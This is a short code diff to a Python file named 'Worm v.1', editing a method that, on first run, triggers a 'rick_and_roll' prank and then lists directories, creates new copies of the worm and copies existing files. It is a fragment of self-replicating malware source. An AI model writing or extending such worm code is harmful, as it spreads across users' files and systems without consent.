--- a/Worm v.1
+++ b/Worm v.1
@@ -180,9 +180,9 @@ class Worm:
     def start_worm_actions(self):
         print(self.target_dir_list)
         try:
-            if self.first_run:
+            if self.first_run == True:
                 self.rick_and_roll()
-            self.threader.append(self.list_directories(self.path))
+            self.list_directories(self.path)
             self.threader.append(self.create_new_worm())
             self.threader.append(self.copy_existing_files())
             self.threader.start()
